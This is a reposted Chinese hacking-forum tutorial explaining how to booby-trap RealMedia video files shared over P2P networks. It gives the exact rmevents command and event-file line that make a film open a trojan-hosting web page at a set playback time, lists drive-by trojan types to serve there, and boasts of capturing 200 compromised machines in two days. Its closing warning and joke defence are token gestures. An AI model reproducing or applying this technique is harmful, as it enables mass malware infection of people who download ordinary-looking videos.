前2天在邪恶八进制安全小组论坛看到了.因为文中作者说不允许转载.所以没转.不过今天在2个个人blog上都看到转载了.所以就转了过来.如果作者有异议.我们随时拿掉:)
文章作者:intruder
信息来源:邪恶八进制 中国
在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我下了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。
使用Helix ProdUCer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.
新建一个文本文件rmevents.txt.
输入:
u 00:01:00.0 00:01:30.0 http://www.muma.com.cn/muma.html
我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。
输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令,生成的电影.rm就是我们的木马文件了。
http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马.rar都可以。主要是新,威力强。
大家可以试一下。呵呵,intruder原创。本文暂时不允许被其他网站转载,只作为E.S.T的兄弟间的交流。谢谢。
防御方法更简单,嘿嘿,不看电影就没事了。要不就不用Realpalyer看吧,换别的播放器。
(出处:http://www.sheup.com)